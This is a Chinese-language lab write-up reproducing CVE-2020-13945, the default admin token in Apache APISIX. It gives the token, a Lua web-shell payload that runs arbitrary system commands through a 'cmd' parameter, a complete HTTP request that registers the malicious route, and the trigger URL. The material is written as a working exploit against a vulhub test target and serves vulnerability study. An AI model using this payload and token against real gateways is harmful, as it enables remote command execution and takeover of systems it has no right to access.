Apache APISIX 默认密钥漏洞(CVE-2020-13945)
Apache APISIX 默认密钥漏洞(CVE-2020-13945)
0x01 漏洞简介
Apache APISIX 是一个动态、实时、高性能的 API 网关,基于 Nginx 网络库和 etcd 实现, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。当使用者开启了Admin API,没有配置相应的IP访问策略,且没有修改配置文件Token的情况下,则攻击者利用Apache APISIX的默认Token即可访问Apache APISIX,从而控制APISIX网关。
0x02 影响版本
Apache APISIX 1.2
Apache APISIX 1.3
Apache APISIX 1.4
Apache APISIX 1.5
0x03 环境搭建
下载环境:https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945
运行环境:docker-compose up -d
查看开放端口:docker ps -a
靶机地址:192.168.237.129
0x04 漏洞分析
在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token edd1c9f034335f136f87ad84b625c8f1,攻击者利用这个Token可以访问到管理员接口,进而通过script参数来插入任意LUA脚本并执行。
在官方文档中,有创建路由的方法:https://apisix.apache.org/zh/docs/apisix/getting-started/
APISIX 提供了强大的 Admin API 和 Dashboard 供用户使用。在下述示例中,我们将使用 Admin API 创建一个 Route 并与 Upstream 绑定,当一个请求到达 APISIX 时,APISIX 会将请求转发到指定的上游服务中。
以下示例代码中,我们将为路由配置匹配规则,以便 APISIX 可以将请求转发到对应的上游服务:
curl "http://127.0.0.1:9180/apisix/admin/routes/1" -H "X-API-KEY: edd1c9f034335f136f87ad84b625c8f1" -X PUT -d '
{
"methods": ["GET"],
"host": "example.com",
"uri": "/anything/*",
"upstream": {
"type": "roundrobin",
"nodes": {
"httpbin.org:80": 1
}
}
}'
该配置意味着,当请求满足下述的所有规则时,请求将被转发到上游服务(httpbin.org:80):
- 请求的 HTTP 方法为
GET。 - 请求头包含
host字段,且它的值为example.com。 - 请求路径匹配
/anything/*,*意味着任意的子路径,例如/anything/foo?arg=10。
与payload对比,发现payload格式与官方创建路由一致,只是利用script插入了一段lua恶意脚本。
#payload
{
"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"example.com:80": 1
}
}
}
接下来对lua脚本进行分析,\n是换行
local _M = {} \n function _M.access(conf, ctx)//在access阶段进行处理,检查如果达到的不健康次数超过了配置的最大次数,则就被break掉
local os = require('os')//加载os模块,用于进行文件操作
local args = assert(ngx.req.get_uri_args()) //assert()是断言,类似于try(),这里是获取uri中给的参数。
local f = assert(io.popen(args.cmd, 'r'))//io.popen()用于执行系统命令,'r'是模式
local s = assert(f:read('*a'))//读取全部内容, "a" 从当前位置读取剩余的全部内容
ngx.say(s)//输出,还有一种方法是ngx.print(),但两者有区别
f:close()
end
return _M
0x05 漏洞复现
环境启动成功后,访问http://192.168.237.129:9080即可查看到默认的404页面。
(3)使用Burp Suite抓包,利用默认Token增加一个恶意的router,
1、请求方法改为POST
2、加上参数X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
3、加上payload
其中包含恶意LUA脚本:
POST /apisix/admin/routes HTTP/1.1
Host: 192.168.237.129:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406
{
"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"example.com:80": 1
}
}
}
(4)然后,我们访问刚才添加的router,访问设置的uri:/attack,就可以通过cmd参数执行任意命令:http://192.168.237.129:9080/attack?cmd=pwd
